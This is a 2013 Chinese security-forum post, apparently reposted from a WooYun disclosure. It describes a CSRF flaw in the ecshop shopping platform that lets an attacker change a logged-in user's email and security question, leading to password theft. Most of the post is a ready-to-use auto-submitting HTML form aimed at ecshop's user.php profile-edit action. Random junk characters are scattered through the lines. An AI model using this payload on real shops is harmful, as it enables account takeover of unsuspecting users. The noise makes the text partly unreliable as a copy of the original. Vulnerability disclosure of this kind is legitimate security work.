找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2082|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:% w. l8 a1 j- P  z$ o
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现" M+ T# d: T/ L0 q

% Z* p6 B( C% c6 e  Q' Z) vDemo For:http://www.wooyun.org/bug.php?action=view&id=395' X$ ?( [' h6 k& N5 |' n+ J
, \, e+ b9 l. g/ T! C8 @
详细说明:
& i6 Y0 B5 E" \- o+ ^利用csrf和xss可以突破官方所说的“障碍”9 _7 J6 ~+ I' B/ X' H- d% N
xss版本已经有人说明
6 |( p, r/ C, j$ {! q1 c; W这里给出csrf版本+ ]4 o: R" G( }

: C* z2 I; R1 I  N* A* i9 a漏洞证明:- Z5 b6 c3 Y# V% T$ h
<html>) ?6 j3 N2 W. c! d' l: b
<body>
$ j4 }1 l) Y0 A- M<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
9 A- I. k& _' h; ]! r<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">+ U/ P' n' n0 ]: Y9 \
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
7 m$ }! `, M  F8 g9 ?5 G* V<INPUT TYPE="text" NAME="sel_question" value="ecshop">
0 J5 M) s- l, _& i; B) i' i<INPUT TYPE="text" NAME="passwd_answer" value="exploit">& ?5 n* a' d! S9 [" [- v1 k
</body>8 I8 j& R( S) X0 E. e3 i( D
<script>) k  p. A' \4 D9 e" g0 b/ p3 A
document.forms[0].submit();
! L6 w0 ]& ?5 x8 P: a</script>
, S; Y: i# o& ^" N% W</html>
- }( }& F5 X1 E, u# Q/ ?构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
% K. J+ X9 U2 Y) e! x3 f8 p% R+ T4 f. g( |% W7 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表